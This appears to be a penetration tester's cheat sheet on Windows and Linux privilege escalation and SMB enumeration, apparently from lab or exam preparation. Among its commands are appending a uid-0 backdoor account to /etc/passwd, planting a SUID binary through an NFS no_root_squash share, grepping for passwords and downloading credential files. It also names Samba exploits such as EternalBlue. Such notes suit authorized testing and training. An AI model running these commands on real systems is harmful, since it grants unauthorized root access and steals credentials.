https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
Winpeas.exe > out.txt
#PowerUp
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
. .\PowerUp.ps1
Invoke-AllChecks
#Suggester
https://github.com/bitsadmin/wesng
pip install wesng
wes --update
systeminfo > systeminfo.txt
wes systeminfo.txt
#sharpup
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
SharpUp.exe audit
SharpUp.exe HijackablePaths
SharpUp.exe UnquotedServicePath
SharpUp.exe AlwaysInstallElevated
#PrivescCheck
https://github.com/itm4n/PrivescCheck
. .\PrivescCheck.ps1
Invoke-PrivescCheck
#Sherlock
https://github.com/rasta-mouse/Sherlock
. .\Sherlock.ps1
Find-AllVulns
Linux
Enumeration
lsblk
hostname
/proc/version
ps aux - ps axjf
/etc/passwd
.bash_history or history
netstat -putan
ifconfig or ip a
cat /etc/os-release or cat /etc/issue
uname -a
id
sudo -l
cat /etc/fstab
env
ls -alt $(find / -perm -4000 -type f 2>/dev/null)
find / -user vivek 2>/dev/null
find / -writable -type d 2>/dev/null
find / -mtime -10 2>/dev/null # modified in the last 10 days (-mtime 10 alone matches only files modified exactly 10 days ago)
cat /etc/crontab && ls -altR /etc/cron*
which perl && which python && which gcc
find . -type f -exec grep -inH "password" {} \;
Cron files
grep -i cron /var/log/cron.log |grep -i cmd
grep CRON /var/log/syslog
ls -altR /etc/cron*
Passwd writeable
openssl passwd p4ssw0rd
echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd
Tools
LinPeas https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum https://github.com/rebootuser/LinEnum
Linux Exploit Suggester https://github.com/mzet-/linux-exploit-suggester
Linux Smart Enumeration https://github.com/diego-treitos/linux-smart-enumeration
Linux Priv Checker https://github.com/linted/linuxprivchecker
Getcaps
getcap -r / 2>/dev/null
NFS no_root_squash
cat /etc/exports # look for no_root_squash: root on the client keeps uid 0 on the share, so a SUID binary copied in is root-owned on the server
mount -t nfs 10.1.1.27:/srv/Share share/
cp sushi share/
chmod 4755 share/sushi
Samba
SMBmap
smbmap -H 192.168.1.135
smbmap -u offsec -p lab -H 192.168.1.135
smbmap -H 10.11.1.146 -r 'SusieShare'
smbmap -H 10.11.1.146 --download 'SusieShare/FsSRC.txt'
smbmap -H 10.11.1.136 -R 'Bob Share\rootdir' -A "authorized_keys"
SMBclient
smbclient -N -L //192.168.1.135 # unquoted \\host loses a backslash in bash; use //host or quote it
smbclient //192.168.1.136/share$
smbclient -U 'svc-admin%management2005' -L //10.10.92.76
smbclient //10.10.92.76/backup -c 'cd folder;get backup_credentials.txt' -U 'svc-admin%management2005'
RPCclient
rpcclient -U "" 10.10.10.10
Mount
mount -t cifs //10.11.1.31/wwwroot wwwroot/
mount -t cifs //server-name/share-name /mnt/cifs -o username=shareuser,password=sharepassword,domain=nixcraft
· trans2root - Samba 2.2.x
· EternalBlue - MS17-010 - Mount Null IPC$
· SambaCry - Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14
· Symlink directory traversal - Samba 3.0.x
· SMBv2 - CVE-2009-3103 - Windows Vista SP1/SP2 and Server 2008